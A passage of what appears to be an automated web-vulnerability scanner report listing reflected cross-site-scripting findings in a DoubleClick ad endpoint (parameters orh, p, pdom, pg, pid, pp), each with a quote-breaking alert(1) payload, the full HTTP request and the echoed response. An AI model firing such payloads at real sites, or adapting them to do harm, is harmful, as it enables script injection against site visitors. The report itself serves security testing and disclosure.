The value of the orh request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9edc7'-alert(1)-'41c09628970 was submitted in the orh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=9edc7'-alert(1)-'41c09628970&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:39:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2066

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/n%3B240046691%3B7-0%3B0%3B61212128%3B4307-300/250%3B41645543/41663330/1%3B%3B%7Ess
...[SNIP]...
543/41663330/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=9edc7'-alert(1)-'41c09628970&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/http://spongecell.com/api/placements/46405590/clickthrough?noflash=
...[SNIP]...

3.427. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [p parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a81b"-alert(1)-"4e73517cc11 was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=5a81b"-alert(1)-"4e73517cc11&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:37:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2070

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/h%3B240046691%3B6-0%3B0%3B61212128%3B4307-300/250%3B41645542/41663329/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=5a81b"-alert(1)-"4e73517cc11&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.
...[SNIP]...

3.428. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [p parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2632e'-alert(1)-'577e5e6838f was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=2632e'-alert(1)-'577e5e6838f&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:37:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2066

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/g%3B240046691%3B2-0%3B0%3B61212128%3B4307-300/250%3B41645536/41663323/1%3B%3B%7Ess
...[SNIP]...
et/click%3Bh%3Dv8/3af6/17/14a/%2a/g%3B240046691%3B2-0%3B0%3B61212128%3B4307-300/250%3B41645536/41663323/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=2632e'-alert(1)-'577e5e6838f&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.
...[SNIP]...

3.429. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pdom parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1be3'-alert(1)-'7047e28cee9 was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=f1be3'-alert(1)-'7047e28cee9&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:39:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2066

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/t%3B240046691%3B0-0%3B0%3B61212128%3B4307-300/250%3B41645533/41663320/1%3B%3B%7Ess
...[SNIP]...
://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=f1be3'-alert(1)-'7047e28cee9&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/http://spongecell.com/api/placements/46376856/clickthrough?noflash=true&noscript=true&site_id=794364&pla
...[SNIP]...

3.430. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pdom parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53fa6"-alert(1)-"a029626a71 was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=53fa6"-alert(1)-"a029626a71&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:39:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2068

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/149/%2a/o%3B240046691%3B3-0%3B0%3B61212128%3B4307-300/250%3B41645537/41663324/1%3B%3B%7Ess
...[SNIP]...
://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=53fa6"-alert(1)-"a029626a71&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/",
siteId: "794364",
placementId: "61212128"
};

document.write('\n\n<script src=\"http://cdn.roya
...[SNIP]...

3.431. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cacfc'-alert(1)-'c6756df0d3 was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAtcacfc'-alert(1)-'c6756df0d3&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:40:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2064

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/149/%2a/n%3B240046691%3B7-0%3B0%3B61212128%3B4307-300/250%3B41645543/41663330/1%3B%3B%7Ess
...[SNIP]...
&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAtcacfc'-alert(1)-'c6756df0d3&t=2011.04.27.23.35.36&event=58/http://spongecell.com/api/placements/46405590/clickthrough?noflash=true&noscript=true&site_id=794364&placement_id=61212128\" target=\"_blank\">
...[SNIP]...

3.432. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b080"-alert(1)-"7bce70db57a was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt2b080"-alert(1)-"7bce70db57a&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:40:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2066

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/n%3B240046691%3B7-0%3B0%3B61212128%3B4307-300/250%3B41645543/41663330/1%3B%3B%7Ess
...[SNIP]...
&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt2b080"-alert(1)-"7bce70db57a&t=2011.04.27.23.35.36&event=58/",
siteId: "794364",
placementId: "61212128"
};

document.write('\n\n<script src=\"http://cdn.royale.spongecell.com/api/placements/46405590.js\" type=\"text/javasc
...[SNIP]...

3.433. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 586dc'-alert(1)-'7568622394 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=586dc'-alert(1)-'7568622394&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:38:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2068

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/149/%2a/o%3B240046691%3B3-0%3B0%3B61212128%3B4307-300/250%3B41645537/41663324/1%3B%3B%7Ess
...[SNIP]...
240046691%3B3-0%3B0%3B61212128%3B4307-300/250%3B41645537/41663324/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=586dc'-alert(1)-'7568622394&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/http://spongec
...[SNIP]...

3.434. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fbb09"-alert(1)-"9415e248736 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=fbb09"-alert(1)-"9415e248736&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:38:31 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2066

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/g%3B240046691%3B2-0%3B0%3B61212128%3B4307-300/250%3B41645536/41663323/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=fbb09"-alert(1)-"9415e248736&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/",
siteId: "
...[SNIP]...

3.435. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1f9e'-alert(1)-'0465d79ff56 was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100f1f9e'-alert(1)-'0465d79ff56&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:38:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2070

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/o%3B240046691%3B3-0%3B0%3B61212128%3B4307-300/250%3B41645537/41663324/1%3B%3B%7Ess
...[SNIP]...
-0%3B0%3B61212128%3B4307-300/250%3B41645537/41663324/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100f1f9e'-alert(1)-'0465d79ff56&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/http://spongecell.com/api/p
...[SNIP]...

3.436. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a3e0"-alert(1)-"5023a527418 was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=1002a3e0"-alert(1)-"5023a527418&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:38:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2070

document.write('');

var spongecellParams = {
